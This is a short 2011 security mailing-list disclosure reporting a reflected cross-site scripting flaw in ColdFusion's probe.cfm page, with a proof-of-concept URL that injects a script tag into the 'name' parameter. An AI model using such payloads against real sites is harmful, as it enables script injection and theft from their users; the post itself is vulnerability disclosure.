
Date: Thu, 18 Aug 2011 17:28:00 +0800
From: Rem7ter <rem7ter@...il.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: ColdFusion Local Parameter Xss Exploit

 *Describe：*ColdFusion probe.cfm page local parameter can xss

*CVE：*Unknow

*PoC：*

http://127.0.0.1/CFIDE/probe.cfm?name=<script>alert("G.R0b1n")</script>
URL.Name parameter can xss only local.

Or visit:
http://www.focusecurity.org/2011/08/ColdFusion-Local-Parameter-Xss-Exploit.html

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
